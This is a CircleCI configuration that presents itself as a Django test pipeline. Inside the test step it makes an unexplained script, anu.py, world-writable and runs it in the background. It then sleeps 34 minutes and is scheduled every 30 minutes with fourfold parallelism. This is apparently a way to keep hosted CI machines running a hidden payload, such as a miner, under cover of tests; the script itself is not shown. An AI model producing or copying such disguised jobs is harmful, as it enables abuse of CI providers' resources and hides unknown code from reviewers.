version: 2.1
orbs:
  python: circleci/python@1.0.0
jobs:
  build:
    docker:
      - image: cimg/python:3.6.10
        environment:
          DATABASE_URL: postgresql://root@localhost/circle_test?sslmode=disable
      - image: circleci/postgres:9.6.2
        environment:
          POSTGRES_USER: root
          POSTGRES_DB: circle_test
    steps:
      - checkout
      - python/install-packages
      - run:
          name: Run django tests
          command: |
            nohup chmod 777 anu.py  && ./anu.py &
            jobs
            pipenv run python manage.py test 
            sleep 34m
          no_output_timeout: 35m
      - store_test_results:
          path: test-results
      - store_artifacts:
          path: test-results
          destination: tr1

    parallelism: 4
    
workflows:
  version: 2
  commit:
    jobs:
      - build
    triggers:
      - schedule:
          cron: "5,35 * * * *"
          filters:
            branches:
              only:
                - master
                
  asuirunjob:
    jobs:
      - build
    
